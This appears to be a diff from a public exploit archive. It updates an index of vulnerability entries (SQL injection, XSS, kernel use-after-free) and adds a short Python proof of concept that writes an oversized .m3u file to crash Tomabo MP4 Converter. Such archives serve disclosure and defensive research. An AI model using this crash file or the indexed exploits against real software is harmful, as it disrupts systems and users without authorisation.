DB: 2015-10-13

1 new exploits

files.csv

@@ -33625,7 +33625,6 @@ id,file,description,date,author,platform,type,port
 37241,platforms/hardware/webapps/37241.txt,"D-Link DSL-526B ADSL2+ AU_2.01 - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0
 37243,platforms/php/webapps/37243.txt,"Wordpress Wp-ImageZoom 1.1.0 - Multiple Vulnerabilities",2015-06-08,T3N38R15,php,webapps,80
 37244,platforms/php/webapps/37244.txt,"Wordpress Plugin 'WP Mobile Edition' - LFI Vulnerability",2015-06-08,"Ali Khalil",php,webapps,0
-37245,platforms/php/webapps/37245.txt,"Pasworld detail.php - Blind Sql Injection Vulnerability",2015-06-08,"Sebastian khan",php,webapps,0
 37266,platforms/php/webapps/37266.txt,"ClickHeat <= 1.14 Change Admin Password CSRF",2015-06-12,"David Shanahan",php,webapps,80
 37249,platforms/linux/dos/37249.py,"Libmimedir VCF Memory Corruption PoC",2015-06-10,"Jeremy Brown",linux,dos,0
 37250,platforms/xml/webapps/37250.txt,"HP WebInspect <= 10.4 XML External Entity Injection",2015-06-10,"Jakub Palaczynski",xml,webapps,0
@@ -34557,7 +34556,7 @@ id,file,description,date,author,platform,type,port
 38262,platforms/osx/dos/38262.txt,"OS X Regex Engine (TRE) - Integer Signedness and Overflow Issues",2015-09-22,"Google Security Research",osx,dos,0
 38263,platforms/osx/dos/38263.txt,"OS X Regex Engine (TRE) - Stack Buffer Overflow",2015-09-22,"Google Security Research",osx,dos,0
 38264,platforms/osx/dos/38264.txt,"Apple qlmanage - SceneKit::daeElement::setElementName Heap Overflow",2015-09-22,"Google Security Research",osx,dos,0
-38265,platforms/win32/dos/38265.txt,"Window Kernel - Bitmap Handling Use-After-Free (MS15-061) #2",2015-09-22,"Nils Sommer",win32,dos,0
+38265,platforms/win32/dos/38265.txt,"Windows Kernel - Bitmap Handling Use-After-Free (MS15-061) #2",2015-09-22,"Nils Sommer",win32,dos,0
 38266,platforms/win32/dos/38266.txt,"Windows Kernel - DeferWindowPos Use-After-Free (MS15-073)",2015-09-22,"Nils Sommer",win32,dos,0
 38267,platforms/win32/dos/38267.txt,"Windows Kernel - UserCommitDesktopMemory Use-After-Free (MS15-073)",2015-09-22,"Nils Sommer",win32,dos,0
 38268,platforms/win32/dos/38268.txt,"Windows Kernel - Pool Buffer Overflow Drawing Caption Bar (MS15-061)",2015-09-22,"Nils Sommer",win32,dos,0
@@ -34726,3 +34725,4 @@ id,file,description,date,author,platform,type,port
 38439,platforms/php/webapps/38439.txt,"WordPress Traffic Analyzer Plugin 'aoid' Parameter Cross Site Scripting Vulnerability",2013-04-09,Beni_Vanda,php,webapps,0
 38440,platforms/php/webapps/38440.txt,"phpMyAdmin 'tbl_gis_visualization.php' Multiple Cross Site Scripting Vulnerabilities",2013-04-09,waraxe,php,webapps,0
 38441,platforms/php/webapps/38441.txt,"WordPress Spiffy XSPF Player Plugin 'playlist_id' Parameter SQL Injection Vulnerability",2013-04-10,"Ashiyane Digital Security Team",php,webapps,0
+38444,platforms/win32/dos/38444.py,"Tomabo MP4 Converter 3.10.12 - 3.11.12 (.m3u) Denial of service (Crush application)",2015-10-11,"mohammed Mohammed",win32,dos,0

platforms/win32/dos/38444.py

@@ -0,0 +1,16 @@
+#!/usr/bin/python
+# Exploit Title: Tomabo MP4 Converter 3.10.12 - (.m3u) Denial of service (Crush application)
+
+# Date: [8-10-2015]
+# Exploit Author: [M.Ibrahim]  vulnbug@gmail.com
+# E-Mail:  vulnbug  <at>  gmail.com
+# Vendor Homepage: http://www.tomabo.com/mp4-converter/index.html
+# Version: [3.10.12] 
+# Tested on: windows 7 x86
+
+
+junk="A"*600000
+file = "exploit.m3u"
+f=open(file,"w")
+f.write(junk);
+f.close();